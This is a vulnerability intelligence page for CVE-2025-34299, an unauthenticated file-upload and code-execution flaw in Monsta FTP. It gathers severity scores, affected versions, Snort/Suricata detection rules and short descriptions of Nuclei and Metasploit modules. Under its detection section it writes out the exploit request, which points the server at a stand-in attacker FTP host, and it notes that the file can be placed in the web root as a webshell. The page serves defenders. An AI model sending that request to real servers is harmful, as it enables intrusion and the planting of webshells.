CVE-2025-34299
Published 2025-11-07
Priority P192 · critical · 9.8 (CVSS 3.1)
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · Exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 72.54% (99.4th percentile)
Monsta FTP versions 2.11 and earlier contain a vulnerability that allows unauthenticated arbitrary file uploads. This flaw enables attackers to execute arbitrary code by uploading a specially crafted file from a malicious (S)FTP server.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| monsta_limited_of_new_zealand | monsta_ftp | <= 2.11 | — |
| monstaftp | monsta_ftp | <= 2.11 | — |
Detection & IOCs (extracted from sources)

command:
```text
request={"connectionType":"ftp","configuration":{"host":"<attacker>","username":"nuclei-oast","initialDirectory":"/","password":"test","port":21},"actionName":"downloadFile","context":{"remotePath":"/test.txt","localPath":"/tmp/nuclei-oast-test.txt"}}
```
other: actionName: downloadFile

snort (sid:2065695, CVE-2025-34299):
```text
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Monsta FTP Arbitrary File Upload Attempt (CVE-2025-34299)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/mftp/application/api/api.php"; http.request_body; content:"|22|actionName|22 3a 22|downloadFile|22|"; fast_pattern; content:"|22|remotePath|22 3a 22 2f|"; content:"|22|localpath|22 3a 22 2f|"; reference:url,labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/; reference:cve,2025-32499; reference:cve,2025-34299; classtype:attempted-admin; sid:2065695; rev:1; metadata:affected_product Monsta_FTP, attack_target Networking_Equipment, tls_state plaintext, created_at 2025_11_07, cve CVE_2025_34299, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_11_07, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
```
Note that this rule's third content match is the lower-case `localpath` with no `nocase` modifier, while the request body above and the vendor API use `localPath`; content matches are case-sensitive by default, so confirm the rule actually fires against observed traffic before relying on it.

snort (sid:2065694, CVE-2022-31827):
```text
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Monsta FTP Server Side Request Forgery Attempt (CVE-2022-31827)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/application/api/api.php"; http.request_body; content:"|22|actionName|22 3a 22|fetchRemoteFile|22|"; fast_pattern; content:"|22|source|22 3a 22|http|3a 2f 2f|"; reference:url,labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/; reference:cve,2022-31827; classtype:web-application-attack; sid:2065694; rev:1;)
```
bytes: |22|actionName|22 3a 22|downloadFile|22|
bytes: |22|remotePath|22 3a 22 2f|
bytes: |22|localpath|22 3a 22 2f|
- Exploit traffic targets POST /mftp/application/api/api.php with a JSON body containing actionName=downloadFile, remotePath, and localPath fields, all unauthenticated.
- The attacker supplies an attacker-controlled FTP/SFTP host in the 'host' field of the JSON configuration, causing the server to connect outbound to the malicious server and download a file to an arbitrary localPath.
- Detect Monsta FTP instances via Shodan/FOFA using the page title 'Monsta FTP' for asset discovery before exploitation.
- Version fingerprinting: extract the version from the JS filename pattern monsta-min-<version>.js in the page body; versions <= 2.11.2 are vulnerable.
- OOB/OAST detection: the exploit causes an outbound DNS/FTP connection from the victim server to the attacker's host; monitor for unexpected outbound FTP (port 21) connections from web server processes.
- The localPath parameter in the downloadFile request can be set to web-accessible directories, enabling webshell placement; monitor for new PHP/script files created in the web root after POST requests to api.php.
- The Nuclei template targets both /mftp/ and / as base paths with stop-at-first-match, meaning the api.php endpoint may be at /mftp/application/api/api.php or /application/api/api.php depending on the installation.
- The Metasploit module uses FTP (not SFTP) to exploit the vulnerability, though the vulnerability also supports SFTP as the connectionType.
- The ET Snort rule for CVE-2025-34299 (sid:2065695) references both CVE-2025-32499 and CVE-2025-34299, suggesting overlap or related CVEs for the same endpoint.
CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | v4.0 | 9.3 | CRITICAL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
| VulnCheck | — | 9.3 | CRITICAL | — |
GHSA
GHSA-42m5-3r2p-wr92 · ghsa_unreviewed · 2025-11-07 · CVE-2025-34299 [CRITICAL] · CWE-434
Monsta FTP versions 2.11 and earlier contain a vulnerability that allows unauthenticated arbitrary file uploads. This flaw enables attackers to execute arbitrary code by uploading a specially crafted file from a malicious (S)FTP server.
VulnCheck
CVE-2025-34299 [CRITICAL] · vulncheck · 2025 · CVSS 9.3
monstaftp monsta_ftp Unrestricted Upload of File with Dangerous Type
- Affected: monstaftp monsta_ftp
- Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
- Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2025-34299
- Exploit PoC: https://vulncheck.com/xdb/bee3418c74a0; https://vulncheck.com/xdb/3e3b6329e753; https://vulncheck.com/xdb/945d96870d3f
Suricata
CVE-2022-31827 [CRITICAL] · suricata · 2025-11-07 · CVSS 9.1
ET WEB_SPECIFIC_APPS Monsta FTP Server Side Request Forgery Attempt (CVE-2022-31827)
Rule:
```text
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Monsta FTP Server Side Request Forgery Attempt (CVE-2022-31827)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/application/api/api.php"; http.request_body; content:"|22|actionName|22 3a 22|fetchRemoteFile|22|"; fast_pattern; content:"|22|source|22 3a 22|http|3a 2f 2f|"; reference:url,labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/; reference:cve,2022-31827; classtype:web-application-attack; sid:2065694; rev:1; metadata:affected_product Monsta_FTP, attack_target Networking_Equipment, tls_state plaintext, created_at 2025_11_07, cve CVE_2022_31827, deploymen
```
Suricata
CVE-2025-32499 [CRITICAL] · suricata · 2025-11-07 · CVSS 9.3
ET WEB_SPECIFIC_APPS Monsta FTP Arbitrary File Upload Attempt (CVE-2025-34299)
Rule: sid:2065695, as quoted in full under Detection & IOCs above.
Nuclei
CVE-2025-34299 [CRITICAL] · nuclei · CVSS 9.3
Monsta FTP <= 2.11.2 - Unauthenticated Remote Code Execution
Monsta FTP <= 2.11 contains an unrestricted file upload vulnerability caused by lack of authentication on file uploads, letting unauthenticated attackers execute arbitrary code by uploading crafted files.
Template:
```yaml
id: CVE-2025-34299
info:
  name: Monsta FTP <= 2.11.2 - Unauthenticated Remote Code Execution
  author: KrE80r
  severity: critical
  description: |
    Monsta FTP <= 2.11 contains an unrestricted file upload vulnerability caused by lack of authentication on file uploads, letting unauthenticated attackers execute arbitrary code by uploading crafted files.
  impact: |
    Unauthenticated attackers can upload malicious files to execute arbitrary code, potentially compromising the server.
  remediation: |
    Update to the latest version beyon
```
Metasploit
Monsta FTP downloadFile Remote Code Execution
This module exploits a pre-authenticated remote code execution vulnerability in Monsta FTP versions < 2.11.3. The vulnerability exists in the downloadFile action, which allows an attacker to connect to a malicious FTP or SFTP server and download arbitrary files to arbitrary locations on the Monsta FTP server. This module uses FTP to exploit the vulnerability.